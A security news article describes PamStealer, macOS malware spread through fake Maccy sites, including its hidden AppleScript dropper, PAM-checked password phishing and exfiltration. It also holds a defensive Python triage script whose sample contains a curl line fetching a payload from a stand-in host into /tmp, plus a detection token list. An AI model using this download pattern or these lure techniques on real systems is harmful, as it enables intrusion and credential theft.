
PamStealer Uses Fake Maccy Sites and PAM Checks to Steal Mac Passwords

Cybersecurity researchers have flagged a new macOS malware strain called PamStealer, which uses a series of tactics to infect systems and siphon sensitive data.

The malware, discovered by Jamf Threat Labs, is distributed as a compiled AppleScript (.scpt) file masquerading as Maccy, a legitimate open-source clipboard manager. It was codenamed PamStealer because it verifies the victim's login password against macOS Pluggable Authentication Modules (PAM) before capturing it.

The malware is delivered in two stages: an AppleScript embedded in a downloadable disk image, which acts as the dropper, and a second-stage payload that it fetches. The second artifact is a Rust-based infostealer capable of credential theft, browser data collection, persistence, and exfiltration.

The initial access vector for the malware is a look-alike site ("maccyapp[.]com") that imitates the real Maccy site ("maccy[.]app"). The AppleScript ("Maccy.scpt") contained within the disk image uses a self-contained JavaScript for Automation (JXA) loader that fetches and stages the payload using native Objective-C APIs.

What is noteworthy here is that the script, once opened in Script Editor, displays instructions to run it with the keyboard shortcut "⌘ + R" or by clicking the Run button in Script Editor. Doing so executes the malicious logic, which is hidden further down the file beneath a large block of empty lines so that it is not visible when the script is first opened.

“Notably, this works even if the file still contains the com.apple.quarantine attribute, which makes this approach attractive to attackers as Apple continues to strengthen Gatekeeper and Terminal,” said security researcher Thijs Xhaflaire. “Combined with a second layer based on Rust and a password capture workflow that authenticates credentials locally with PAM, the result is a quieter kill chain than we usually see from macOS hackers.”
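The blank-line padding described above is something a triage script can look for. The following is an added example, not code from Jamf's report or the Maccy project: it scans decompiled script text (for instance the output of `osadecompile`, an assumption about your workflow; here a constructed sample is embedded instead) for the longest run of blank lines and flags loader-style code that sits beneath it.

```python
from dataclasses import dataclass

# Constructed sample of decompiled script text that mimics the lure layout the
# report describes: a friendly "press ⌘ + R" banner, then hundreds of blank
# lines, then the real logic. The lines after the gap are placeholders, not
# PamStealer's code.
SAMPLE_SCRIPT = (
    'display dialog "Maccy setup: press ⌘ + R or click Run to install"\n'
    + "\n" * 300
    + 'use framework "Foundation"\n'
    + 'set payloadURL to "https://example.invalid/stage2"\n'
    + 'do shell script "curl -fsSL " & payloadURL & " -o /tmp/stage2"\n'
)

# Tokens that do not belong in a "setup" banner script. Any of them appearing
# after a large blank gap deserves a human look (a heuristic, not proof).
SUSPICIOUS = (
    "do shell script", "curl ", "NSURLSession", "NSData", "ObjC.import",
    "chmod +x", "launchctl", "LaunchAgents", "osascript",
)

@dataclass
class Verdict:
    visible_lines: int   # non-blank lines before the largest blank gap
    gap_size: int        # longest run of consecutive blank lines
    hidden_lines: int    # non-blank lines after that gap
    hits: list           # suspicious tokens found in the hidden part
    suspicious: bool

def longest_blank_run(lines):
    """Return (start_index, length) of the longest run of blank lines."""
    best_start, best_len, run_start, run_len = 0, 0, 0, 0
    for i, line in enumerate(lines + ["x"]):  # sentinel flushes the last run
        if line.strip() == "":
            if run_len == 0:
                run_start = i
            run_len += 1
        else:
            if run_len > best_len:
                best_start, best_len = run_start, run_len
            run_len = 0
    return best_start, best_len

def triage(script_text, min_gap=50):
    """Flag scripts whose code hides below a blank gap of at least min_gap lines."""
    lines = script_text.splitlines()
    start, gap = longest_blank_run(lines)
    before = [l for l in lines[:start] if l.strip()]
    after = [l for l in lines[start + gap:] if l.strip()]
    hits = sorted({tok for tok in SUSPICIOUS for l in after if tok in l})
    return Verdict(len(before), gap, len(after), hits,
                   gap >= min_gap and bool(after) and bool(hits))
```

Feed it the decompiled text of any `.scpt` that arrived in a disk image; a verdict with a large gap and hits is a reason to quarantine the file before anyone presses Run.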

The AppleScript dropper includes environment-aware checks that allow execution to proceed only after fingerprinting the host and determining that it is running on Apple Silicon. It does this by deriving a key from host fingerprint data, such as CPU architecture, locale, keyboard layout, and time zone, and using that key to decrypt an encrypted configuration containing the download URL and installation path.

On Intel-based Macs, the derived decryption key differs and fails to decrypt the configuration, so the dropper terminates. The script also refuses to execute within sandboxed or analysis environments, and on systems whose time zone, locale, or keyboard layout resolves to Eastern European and CIS countries such as Russia, Belarus, Kazakhstan, Armenia, Azerbaijan, Kyrgyzstan, Moldova, Tajikistan, Uzbekistan, Turkmenistan, and Georgia.

Once these checks pass, the script contacts the external server and downloads a Mach-O binary written in Rust that masquerades as a Finder app and is responsible for harvesting data from web browsers, cryptocurrency wallet extensions, iCloud Keychain, and clipboard content. The captured information is then encrypted and exfiltrated to attacker-controlled infrastructure ("avenger-sync[.]live") over an outbound HTTP request.

Rather than forcing the user to grant Full Disk Access, the stealer displays a native-looking password prompt that collects the victim's system password and then verifies the entered password locally through the PAM API. If authentication fails, it prompts the user to re-enter the password and repeats the loop until the correct password is supplied.

"Once the password is captured, the stealer displays a second, fake warning: 'Maccy is damaged and cannot be opened. You should trash it,' a close copy of the original Gatekeeper message," Jamf said. "This is a trick. When it appears, the payload is already active, it has captured the password and registered persistence, so the message only works to make the victim abandon the lure and think that the download is broken."

Also built into the Rust binary is a small arm64 Mach-O that impersonates macOS System Settings and is used to establish persistence.

The development prompted Alex Rodionov, the developer of Maccy, to post a warning on their website and GitHub repository, saying, “Beware of fake websites impersonating Maccy. Malicious sites (like maccyapp[.]net and maccyapp[.]com) distributed malware disguised as Maccy. maccy.app is the only official website.”

"Together, these behaviors show how macOS stealers continue to evolve, using silent kill chains and traditional exploits that reduce the likelihood of traditional detection while maintaining compatibility with the standard features of macOS," said Jamf.
